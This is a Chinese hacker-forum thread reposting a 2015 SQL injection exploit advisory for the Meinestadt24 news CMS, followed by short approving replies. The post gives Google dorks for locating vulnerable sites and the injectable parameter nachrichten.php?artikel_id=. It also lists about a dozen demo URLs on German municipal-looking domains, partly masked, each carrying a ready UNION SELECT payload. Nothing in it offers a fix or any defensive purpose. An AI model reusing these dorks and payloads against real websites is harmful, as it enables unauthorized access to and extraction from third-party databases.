查看: 77039|回复: 106

Meinestadt24注入漏洞

[复制链接]
发表于 2015-7-27 11:43:42 | 显示全部楼层 |阅读模式
[PHP] 纯文本查看 复制代码
[-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-]
 
Exploit Title : Meinestadt24 SQL Injection Vulnerability
 
Exploit Author : Ashiyane Digital Security Team
 
Google Dork One : intext:© 2015 meinestadt24
Google Dork Two : inurl:nachrichten.php?artikel_id=
 
Date : 2015-7-25
 
Tested On : Windows Se7en
 
[-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-]
 
Path Of Vulnerability :
 
[url]http://Target.de/nachrichten.php?artikel_id=-AnyNumber[/url] [SQLI]
 
* Reminder : Your Sqli Command Needs UrlEncode
 
[-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-]
Demos :
 
[url]http://www.meiXgriesheim.de/nachrichten.php?artikel_id=-983722[/url] UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
[url]http://www.meiXeckarsulm.de/nachrichten.php?artikel_id=-990952[/url] UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
[url]http://www.meinXnsberg.de/nachrichten.php?artikel_id=-293312[/url] UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
[url]http://www.meXberbach.de/nachrichten.php?artikel_id=-991321[/url] UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
[url]http://www.meXschaffenburg.de/nachrichten.php?artikel_id=-74847[/url] UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
[url]http://www.meXarmstadt.de/nachrichten.php?artikel_id=-996681[/url] UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
[url]http://www.meXabenhausen.de/nachrichten.php?artikel_id=-992823[/url] UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
[url]http://www.meXkarlsruhe.de/nachrichten.php?artikel_id=-88747[/url] UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
[url]http://www.mein-Xchenzell.de/nachrichten.php?artikel_id=-46129[/url] UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
[url]http://www.mXbebra.de/nachrichten.php?artikel_id=-981361[/url] UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
[url]http://www.mein-Xrsch.de/nachrichten.php?artikel_id=-987491[/url] UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
And many more ...
回复

使用道具 举报

发表于 2015-7-27 13:19:12 | 显示全部楼层
支持中国红客联盟(ihonker.org)
回复 支持 反对

使用道具 举报

发表于 2015-7-28 04:52:04 | 显示全部楼层
支持,看起来不错呢!
回复 支持 反对

使用道具 举报

发表于 2015-7-30 02:33:30 | 显示全部楼层
还是不错的哦,顶了
回复 支持 反对

使用道具 举报

发表于 2015-7-30 07:59:31 | 显示全部楼层
感谢楼主的分享~
回复 支持 反对

使用道具 举报

发表于 2015-7-31 10:20:02 | 显示全部楼层
支持,看起来不错呢!
回复 支持 反对

使用道具 举报

发表于 2015-7-31 16:21:31 | 显示全部楼层
回复 支持 反对

使用道具 举报

发表于 2015-7-31 17:13:01 | 显示全部楼层
支持中国红客联盟(ihonker.org)
回复 支持 反对

使用道具 举报

发表于 2015-8-1 01:59:45 | 显示全部楼层
支持,看起来不错呢!
回复 支持 反对

使用道具 举报

发表于 2015-8-1 04:38:03 | 显示全部楼层
学习学习技术,加油!
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-3-7 15:39 , Processed in 0.027603 second(s), 12 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部